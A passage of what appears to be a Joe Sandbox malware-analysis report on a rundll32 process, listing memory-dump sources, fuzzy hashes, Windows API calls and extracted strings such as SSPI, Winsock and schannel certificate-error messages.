                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast$DisablePrintScreen@@
                    • String ID:
                    • API String ID: 1695489132-0
                    • Opcode ID: 5660353f57c367ec0877beb0c7e2e29d89b199232738891369a4ca84d407b132
                    • Instruction ID: 8a69be3a5b12c5c78e9763d4c20ee52d38b3fdf15b3cc4efe35db0f048c6179b
                    • Opcode Fuzzy Hash: 5660353f57c367ec0877beb0c7e2e29d89b199232738891369a4ca84d407b132
                    • Instruction Fuzzy Hash: 85B1E5755047969BE728AB25C891FB7B3F8EF44308F64446DEA83C6580EB74E9858720
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 15ba7d21a9975fdc1d1998c089918a66fbc18e5364f3e5109c28cf8aee5db37b
                    • Instruction ID: ec837d82dc7580389455b0553c46a6c0ff20139322afd841178bf63f5fab8422
                    • Opcode Fuzzy Hash: 15ba7d21a9975fdc1d1998c089918a66fbc18e5364f3e5109c28cf8aee5db37b
                    • Instruction Fuzzy Hash: F3512431A0C3858BE725CF2DD8603BAB7E5EFC6308F54866ED8C9C7242E77195858752
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6bed93afb3aa8b247f55229e1fb3051f7e80f622f4801aba399a508c5cd4bd5d
                    • Instruction ID: 71c2469d584f3f9793c74173611d2b9a6af7f92b1be14d869dc2c95c5e9c3a61
                    • Opcode Fuzzy Hash: 6bed93afb3aa8b247f55229e1fb3051f7e80f622f4801aba399a508c5cd4bd5d
                    • Instruction Fuzzy Hash: A5517172D0011AEFEB14CFA8C9407EEBBB1FF49304F598458E955AB301D774AA51CB90
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction ID: d8eb9f177e0bf7cf2241593b0125c29bc53e2310a4dd57b3c726d5bd927478a7
                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction Fuzzy Hash: 1511E677245083C3F300892DD4B4FB7B3D7EAC526DF38C27AD0624B656DA23A1459580
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction ID: f2f5852ecc3e4682840ae1439ddf76e00da19405a2e6e17f41d2c2df04c39ef9
                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction Fuzzy Hash: 63117177A0308143D7188A3DD4B65F7D795EBC532872CE37AD8C24B758D622F1459580
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction ID: 6217229623a18797916b691b752c5dc1425a5a4b050ca7c597f0a944686e93b1
                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction Fuzzy Hash: A9115B7720508183D2648A7DE9B42BBA395EBC632872CB3FAC3818B75CD522F143A504
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3a3e320f203e8067fcea55abb847e74ddb633779367eb2ed33aaaaf0bb3f510d
                    • Instruction ID: e0e454763ea8004734d8973d87464c9eb2f876cef87ac46d0ee376317e949c09
                    • Opcode Fuzzy Hash: 3a3e320f203e8067fcea55abb847e74ddb633779367eb2ed33aaaaf0bb3f510d
                    • Instruction Fuzzy Hash: C0F0A016102D2143EF02983D70C0AF35B87CFEA958BB124B99588435D2C64F680FE3E4
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EFE000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EFE000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4efe000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2d5486f6e5b9d9d61447aadb6395f99df315b0362e95f2a9dd6700af68e1202b
                    • Instruction ID: 2dc3e5b6a6d928cba46f50c9c87f582115b598da7a33712f04056574820e8ac2
                    • Opcode Fuzzy Hash: 2d5486f6e5b9d9d61447aadb6395f99df315b0362e95f2a9dd6700af68e1202b
                    • Instruction Fuzzy Hash: 36F08232316290CFE721CE1DCCC8F79B3E8EB50678F1924A9E64897171D320F848D650
                    APIs
                    • GetLastError.KERNEL32(00000000,?,?,00000000), ref: 6D01A21D
                    Strings
                    • SEC_E_CRYPTO_SYSTEM_INVALID, xrefs: 6D01A306
                    • SEC_I_SIGNATURE_NEEDED, xrefs: 6D01A5D5
                    • SEC_E_BUFFER_TOO_SMALL, xrefs: 6D01A2C5
                    • SEC_E_SHUTDOWN_IN_PROGRESS, xrefs: 6D01A4B4
                    • SEC_I_COMPLETE_AND_CONTINUE, xrefs: 6D01A58F
                    • SEC_E_INVALID_PARAMETER, xrefs: 6D01A374
                    • SEC_E_CROSSREALM_DELEGATION_FAILURE, xrefs: 6D01A2FC
                    • SEC_E_MUST_BE_KDC, xrefs: 6D01A3F6
                    • SEC_E_OUT_OF_SEQUENCE, xrefs: 6D01A45A
                    • SEC_E_INSUFFICIENT_MEMORY, xrefs: 6D01A356
                    • SEC_E_KDC_INVALID_REQUEST, xrefs: 6D01A3B0
                    • SEC_E_UNFINISHED_CONTEXT_DELETED, xrefs: 6D01A504
                    • SEC_E_BAD_PKGID, xrefs: 6D01A2BE
                    • SEC_E_NO_KERB_KEY, xrefs: 6D01A432
                    • %s - %s, xrefs: 6D01A2A3
                    • SEC_E_KDC_CERT_EXPIRED, xrefs: 6D01A39C
                    • SEC_E_MAX_REFERRALS_EXCEEDED, xrefs: 6D01A3D8
                    • CRYPT_E_REVOKED, xrefs: 6D01A54A
                    • SEC_E_SECPKG_NOT_FOUND, xrefs: 6D01A4A0
                    • SEC_E_SMARTCARD_CERT_EXPIRED, xrefs: 6D01A4BE
                    • SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log., xrefs: 6D01A5F5
                    • SEC_E_NO_CREDENTIALS, xrefs: 6D01A414
                    • SEC_E_ENCRYPT_FAILURE, xrefs: 6D01A338
                    • SEC_E_UNSUPPORTED_PREAUTH, xrefs: 6D01A522
                    • %s (0x%08X), xrefs: 6D01A26D
                    • SEC_E_TOO_MANY_PRINCIPALS, xrefs: 6D01A4FA
                    • SEC_E_QOP_NOT_SUPPORTED, xrefs: 6D01A482
                    • SEC_E_REVOCATION_OFFLINE_C, xrefs: 6D01A48C
                    • SEC_E_SMARTCARD_CERT_REVOKED, xrefs: 6D01A4C8
                    • SEC_E_CERT_UNKNOWN, xrefs: 6D01A2E1
                    • SEC_I_NO_LSA_CONTEXT, xrefs: 6D01A5C1
                    • SEC_E_ISSUING_CA_UNTRUSTED_KDC, xrefs: 6D01A392
                    • SEC_I_COMPLETE_NEEDED, xrefs: 6D01A26C, 6D01A599
                    • SEC_E_LOGON_DENIED, xrefs: 6D01A3CE
                    • SEC_E_NO_TGT_REPLY, xrefs: 6D01A450
                    • SEC_E_DELEGATION_REQUIRED, xrefs: 6D01A324
                    • SEC_E_CANNOT_INSTALL, xrefs: 6D01A2CC
                    • SEC_E_UNKNOWN_CREDENTIALS, xrefs: 6D01A50E
                    • SEC_E_PKINIT_CLIENT_FAILURE, xrefs: 6D01A464
                    • SEC_E_ISSUING_CA_UNTRUSTED, xrefs: 6D01A388
                    • SEC_E_POLICY_NLTM_ONLY, xrefs: 6D01A478
                    • SEC_E_DELEGATION_POLICY, xrefs: 6D01A31A
                    • SEC_E_NOT_OWNER, xrefs: 6D01A400
                    • SEC_E_TIME_SKEW, xrefs: 6D01A4F0
                    • SEC_E_UNTRUSTED_ROOT, xrefs: 6D01A52C
                    • SEC_E_PKINIT_NAME_MISMATCH, xrefs: 6D01A46E
                    • SEC_I_LOCAL_LOGON, xrefs: 6D01A5B7
                    • SEC_E_REVOCATION_OFFLINE_KDC, xrefs: 6D01A496
                    • SEC_E_INTERNAL_ERROR, xrefs: 6D01A360
                    • SEC_E_UNSUPPORTED_FUNCTION, xrefs: 6D01A518
                    • SEC_E_SECURITY_QOS_FAILED, xrefs: 6D01A4AA
                    • SEC_E_INCOMPLETE_CREDENTIALS, xrefs: 6D01A342
                    • SEC_E_INCOMPLETE_MESSAGE, xrefs: 6D01A34C
                    • SEC_E_CERT_WRONG_USAGE, xrefs: 6D01A2E8
                    • Unknown error, xrefs: 6D01A5DF
                    • No error, xrefs: 6D01A562
                    • SEC_I_INCOMPLETE_CREDENTIALS, xrefs: 6D01A5AD
                    • SEC_E_DOWNGRADE_DETECTED, xrefs: 6D01A32E
                    • SEC_E_WRONG_PRINCIPAL, xrefs: 6D01A540
                    • SEC_E_INVALID_HANDLE, xrefs: 6D01A36A
                    • SEC_E_NO_AUTHENTICATING_AUTHORITY, xrefs: 6D01A40A
                    • SEC_E_MESSAGE_ALTERED, xrefs: 6D01A3E2
                    • SEC_E_NO_IMPERSONATION, xrefs: 6D01A41E
                    • SEC_E_CANNOT_PACK, xrefs: 6D01A2D3
                    • SEC_E_CERT_EXPIRED, xrefs: 6D01A2DA
                    • SEC_E_ALGORITHM_MISMATCH, xrefs: 6D01A266
                    • SEC_E_CONTEXT_EXPIRED, xrefs: 6D01A2F2
                    • SEC_E_KDC_UNABLE_TO_REFER, xrefs: 6D01A3BA
                    • SEC_I_CONTEXT_EXPIRED, xrefs: 6D01A5A3
                    • SEC_E_NO_PA_DATA, xrefs: 6D01A43C
                    • SEC_E_SMARTCARD_LOGON_REQUIRED, xrefs: 6D01A4D2
                    • SEC_I_RENEGOTIATE, xrefs: 6D01A5CB
                    • SEC_E_MULTIPLE_ACCOUNTS, xrefs: 6D01A3EC
                    • SEC_E_WRONG_CREDENTIAL_HANDLE, xrefs: 6D01A536
                    • SEC_E_KDC_UNKNOWN_ETYPE, xrefs: 6D01A3C4
                    • SEC_E_INVALID_TOKEN, xrefs: 6D01A37E
                    • SEC_E_TARGET_UNKNOWN, xrefs: 6D01A4E6
                    • SEC_I_CONTINUE_NEEDED, xrefs: 6D01A56C
                    • SEC_E_BAD_BINDINGS, xrefs: 6D01A2B7
                    • SEC_E_KDC_CERT_REVOKED, xrefs: 6D01A3A6
                    • SEC_E_STRONG_CRYPTO_NOT_SUPPORTED, xrefs: 6D01A4DC
                    • SEC_E_DECRYPT_FAILURE, xrefs: 6D01A310
                    • SEC_E_NO_IP_ADDRESSES, xrefs: 6D01A428
                    • SEC_E_NO_S4U_PROT_SUPPORT, xrefs: 6D01A446
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID: %s (0x%08X)$%s - %s$CRYPT_E_REVOKED$No error$SEC_E_ALGORITHM_MISMATCH$SEC_E_BAD_BINDINGS$SEC_E_BAD_PKGID$SEC_E_BUFFER_TOO_SMALL$SEC_E_CANNOT_INSTALL$SEC_E_CANNOT_PACK$SEC_E_CERT_EXPIRED$SEC_E_CERT_UNKNOWN$SEC_E_CERT_WRONG_USAGE$SEC_E_CONTEXT_EXPIRED$SEC_E_CROSSREALM_DELEGATION_FAILURE$SEC_E_CRYPTO_SYSTEM_INVALID$SEC_E_DECRYPT_FAILURE$SEC_E_DELEGATION_POLICY$SEC_E_DELEGATION_REQUIRED$SEC_E_DOWNGRADE_DETECTED$SEC_E_ENCRYPT_FAILURE$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_E_INCOMPLETE_CREDENTIALS$SEC_E_INCOMPLETE_MESSAGE$SEC_E_INSUFFICIENT_MEMORY$SEC_E_INTERNAL_ERROR$SEC_E_INVALID_HANDLE$SEC_E_INVALID_PARAMETER$SEC_E_INVALID_TOKEN$SEC_E_ISSUING_CA_UNTRUSTED$SEC_E_ISSUING_CA_UNTRUSTED_KDC$SEC_E_KDC_CERT_EXPIRED$SEC_E_KDC_CERT_REVOKED$SEC_E_KDC_INVALID_REQUEST$SEC_E_KDC_UNABLE_TO_REFER$SEC_E_KDC_UNKNOWN_ETYPE$SEC_E_LOGON_DENIED$SEC_E_MAX_REFERRALS_EXCEEDED$SEC_E_MESSAGE_ALTERED$SEC_E_MULTIPLE_ACCOUNTS$SEC_E_MUST_BE_KDC$SEC_E_NOT_OWNER$SEC_E_NO_AUTHENTICATING_AUTHORITY$SEC_E_NO_CREDENTIALS$SEC_E_NO_IMPERSONATION$SEC_E_NO_IP_ADDRESSES$SEC_E_NO_KERB_KEY$SEC_E_NO_PA_DATA$SEC_E_NO_S4U_PROT_SUPPORT$SEC_E_NO_TGT_REPLY$SEC_E_OUT_OF_SEQUENCE$SEC_E_PKINIT_CLIENT_FAILURE$SEC_E_PKINIT_NAME_MISMATCH$SEC_E_POLICY_NLTM_ONLY$SEC_E_QOP_NOT_SUPPORTED$SEC_E_REVOCATION_OFFLINE_C$SEC_E_REVOCATION_OFFLINE_KDC$SEC_E_SECPKG_NOT_FOUND$SEC_E_SECURITY_QOS_FAILED$SEC_E_SHUTDOWN_IN_PROGRESS$SEC_E_SMARTCARD_CERT_EXPIRED$SEC_E_SMARTCARD_CERT_REVOKED$SEC_E_SMARTCARD_LOGON_REQUIRED$SEC_E_STRONG_CRYPTO_NOT_SUPPORTED$SEC_E_TARGET_UNKNOWN$SEC_E_TIME_SKEW$SEC_E_TOO_MANY_PRINCIPALS$SEC_E_UNFINISHED_CONTEXT_DELETED$SEC_E_UNKNOWN_CREDENTIALS$SEC_E_UNSUPPORTED_FUNCTION$SEC_E_UNSUPPORTED_PREAUTH$SEC_E_UNTRUSTED_ROOT$SEC_E_WRONG_CREDENTIAL_HANDLE$SEC_E_WRONG_PRINCIPAL$SEC_I_COMPLETE_AND_CONTINUE$SEC_I_COMPLETE_NEEDED$SEC_I_CONTEXT_EXPIRED$SEC_I_CONTINUE_NEEDED$SEC_I_INCOMPLETE_CREDENTIALS$SEC_I_LOCAL_LOGON$SEC_I_NO_LSA_CONTEXT$SEC_I_RENEGOTIATE$SEC_I_SIGNATURE_NEEDED$Unknown error
                    • API String ID: 1452528299-3170461277
                    • Opcode ID: f9f1f85e886ca6fdf73e17775a5dc093ed6db19121733b57841e1d04b2eba67d
                    • Instruction ID: e1d05e102287a36bdd6180de06cf20f83c0e6c73025102ea00c27a44c7493d2d
                    • Opcode Fuzzy Hash: f9f1f85e886ca6fdf73e17775a5dc093ed6db19121733b57841e1d04b2eba67d
                    • Instruction Fuzzy Hash: B481B2756EFE408BB2A256DC4D84FAE65547703B00FE08126FD0B8F24AD613994F479B
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: _strncpy
                    • String ID: Address already in use$Address family not supported$Address not available$Bad access$Bad argument$Bad file$Bad message size$Bad protocol$Bad quota$Blocking call in progress$Call interrupted$Call would block$Connection refused$Connection was aborted$Connection was reset$Descriptor is not a socket$Disconnected$Host down$Host not found$Host not found, try again$Host unreachable$Invalid arguments$Loop??$Name too long$Need destination address$Network down$Network has been reset$Network unreachable$No buffer space$No data record of requested type$Not empty$Operation not supported$Out of file descriptors$Process limit reached$Protocol family not supported$Protocol is unsupported$Protocol option is unsupported$Remote error$Socket has been shut down$Socket is already connected$Socket is not connected$Socket is unsupported$Something is stale$Timed out$Too many references$Too many users$Unrecoverable error in call to nameserver$Winsock library is not ready$Winsock library not initialised$Winsock version not supported
                    • API String ID: 2961919466-3442644082
                    • Opcode ID: d70c5d98a9efc070c4964a440a3f3832deead1cdbd8396b3101600e007687955
                    • Instruction ID: 1df9e0434703411cbf5089114e68f6e9f5a79428fcc43c6ec3265065989add8d
                    • Opcode Fuzzy Hash: d70c5d98a9efc070c4964a440a3f3832deead1cdbd8396b3101600e007687955
                    • Instruction Fuzzy Hash: DE413619AAD2459BB12288DC9FC93BE95B07763220BC6CD76B605CF348EB51DC41439B
                    APIs
                    • CertOpenStore.CRYPT32(00000002,00000000,00000000,00002000,00000000), ref: 6D03F0AC
                    • GetLastError.KERNEL32(?,00000100), ref: 6D03F0C6
                      • Part of subcall function 6D01A940: GetLastError.KERNEL32 ref: 6D01A943
                    • CertCreateCertificateChainEngine.CRYPT32(?,?), ref: 6D03F145
                    • GetLastError.KERNEL32(?,00000100), ref: 6D03F159
                    • CertGetCertificateChain.CRYPT32(?,?,?,?,?,20000000), ref: 6D03F1BA
                    • GetLastError.KERNEL32(?,00000100), ref: 6D03F1CE
                    • CertFreeCertificateChainEngine.CRYPT32(?), ref: 6D03F4CA
                    • CertCloseStore.CRYPT32(?,00000000), ref: 6D03F4DB
                    • CertFreeCertificateChain.CRYPT32(?), ref: 6D03F4EA
                    • CertFreeCertificateContext.CRYPT32(?), ref: 6D03F4F9
                    Strings
                    • schannel: server certificate name verification failed, xrefs: 6D03F45E
                    • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_REVOKED, xrefs: 6D03F21E
                    • schannel: failed to create certificate chain user: %s, xrefs: 6D03F166
                    • 0, xrefs: 6D03F137
                    • schannel: CertGetNameString() failed to match connection hostname (%s) against server certificate names, xrefs: 6D03F480
                    • (memory blob), xrefs: 6D03F0F0
                    • schannel: CertGetNameString() returned no certificate name information, xrefs: 6D03F313
                    • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_UNTRUSTED_ROOT, xrefs: 6D03F25B
                    • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_PARTIAL_CHAIN, xrefs: 6D03F23E
                    • schannel: CertGetNameString() returned certificate name information of unexpected size, xrefs: 6D03F373
                    • schannel: CertGetCertificateChain error mask: 0x%08x, xrefs: 6D03F2AE
                    • schannel: CertGetCertificateChain trust error CERT_TRUST_REVOCATION_STATUS_UNKNOWN, xrefs: 6D03F295
                    • schannel: connection hostname (%s) validated against certificate name (%s), xrefs: 6D03F402
                    • schannel: CertGetCertificateChain failed: %s, xrefs: 6D03F1DB
                    • schannel: Failed to read remote certificate context: %s, xrefs: 6D03F4AE
                    • schannel: connection hostname (%s) did not match against certificate name (%s), xrefs: 6D03F414
                    • schannel: this version of Windows is too old to support certificate verification via CA bundle file., xrefs: 6D03F087
                    • schannel: failed to create certificate store: %s, xrefs: 6D03F0D3
                    • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_NOT_TIME_VALID, xrefs: 6D03F278
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: Cert$Certificate$ChainErrorLast$Free$userStore$CloseContextCreateOpen
                    • String ID: (memory blob)$0$schannel: CertGetCertificateChain error mask: 0x%08x$schannel: CertGetCertificateChain failed: %s$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_NOT_TIME_VALID$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_PARTIAL_CHAIN$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_REVOKED$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_UNTRUSTED_ROOT$schannel: CertGetCertificateChain trust error CERT_TRUST_REVOCATION_STATUS_UNKNOWN$schannel: CertGetNameString() failed to match connection hostname (%s) against server certificate names$schannel: CertGetNameString() returned certificate name information of unexpected size$schannel: CertGetNameString() returned no certificate name information$schannel: Failed to read remote certificate context: %s$schannel: connection hostname (%s) did not match against certificate name (%s)$schannel: connection hostname (%s) validated against certificate name (%s)$schannel: failed to create certificate chain user: %s$schannel: failed to create certificate store: %s$schannel: server certificate name verification failed$schannel: this version of Windows is too old to support certificate verification via CA bundle file.
                    • API String ID: 3686861598-146265318
                    • Opcode ID: 39ccf65536f4a85faeccfb54afd98ce4cf0b95764d4f55344bf36ea1d7c8dae0
                    • Instruction ID: 81fbaf11b15a7a38d35071b6d5221b6052eec0833dc6bd02f5fb1305751f3f6b
                    • Opcode Fuzzy Hash: 39ccf65536f4a85faeccfb54afd98ce4cf0b95764d4f55344bf36ea1d7c8dae0
                    • Instruction Fuzzy Hash: D6D1E7B1908312ABF711DF24DC40F6F7BECAF86308F124929F949A7252D775E9048B56
                    APIs
                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,04EB3D15,04ECC518,00000008,04EB3EA9,?,?,?,04ECC538,0000000C,04EB3F64,?), ref: 04EB49F7
                    • __mtterm.LIBCMT ref: 04EB4A03
                      • Part of subcall function 04EB46CE: DecodePointer.KERNEL32(00000008,04EB3DD8,04EB3DBE,04ECC518,00000008,04EB3EA9,?,?,?,04ECC538,0000000C,04EB3F64,?), ref: 04EB46DF
                      • Part of subcall function 04EB46CE: TlsFree.KERNEL32(0000001C,04EB3DD8,04EB3DBE,04ECC518,00000008,04EB3EA9,?,?,?,04ECC538,0000000C,04EB3F64,?), ref: 04EB46F9
                      • Part of subcall function 04EB46CE: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,04EB3DD8,04EB3DBE,04ECC518,00000008,04EB3EA9,?,?,?,04ECC538,0000000C,04EB3F64,?), ref: 04EBAFA5
                      • Part of subcall function 04EB46CE: _free.LIBCMT ref: 04EBAFA8
                      • Part of subcall function 04EB46CE: DeleteCriticalSection.KERNEL32(0000001C,?,?,04EB3DD8,04EB3DBE,04ECC518,00000008,04EB3EA9,?,?,?,04ECC538,0000000C,04EB3F64,?), ref: 04EBAFCF
                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 04EB4A19
                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 04EB4A26
                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 04EB4A33
                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 04EB4A40
                    • TlsAlloc.KERNEL32(?,?,04EB3D15,04ECC518,00000008,04EB3EA9,?,?,?,04ECC538,0000000C,04EB3F64,?), ref: 04EB4A90
                    • TlsSetValue.KERNEL32(00000000,?,?,04EB3D15,04ECC518,00000008,04EB3EA9,?,?,?,04ECC538,0000000C,04EB3F64,?), ref: 04EB4AAB
                    • __init_pointers.LIBCMT ref: 04EB4AB5
                    • EncodePointer.KERNEL32(?,?,04EB3D15,04ECC518,00000008,04EB3EA9,?,?,?,04ECC538,0000000C,04EB3F64,?), ref: 04EB4AC6
                    • EncodePointer.KERNEL32(?,?,04EB3D15,04ECC518,00000008,04EB3EA9,?,?,?,04ECC538,0000000C,04EB3F64,?), ref: 04EB4AD3
                    • EncodePointer.KERNEL32(?,?,04EB3D15,04ECC518,00000008,04EB3EA9,?,?,?,04ECC538,0000000C,04EB3F64,?), ref: 04EB4AE0
                    • EncodePointer.KERNEL32(?,?,04EB3D15,04ECC518,00000008,04EB3EA9,?,?,?,04ECC538,0000000C,04EB3F64,?), ref: 04EB4AED
                    • DecodePointer.KERNEL32(Function_00004852,?,?,04EB3D15,04ECC518,00000008,04EB3EA9,?,?,?,04ECC538,0000000C,04EB3F64,?), ref: 04EB4B0E
                    • __calloc_crt.LIBCMT ref: 04EB4B23
                    • DecodePointer.KERNEL32(00000000,?,?,04EB3D15,04ECC518,00000008,04EB3EA9,?,?,?,04ECC538,0000000C,04EB3F64,?), ref: 04EB4B3D
                    • GetCurrentThreadId.KERNEL32 ref: 04EB4B4F
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
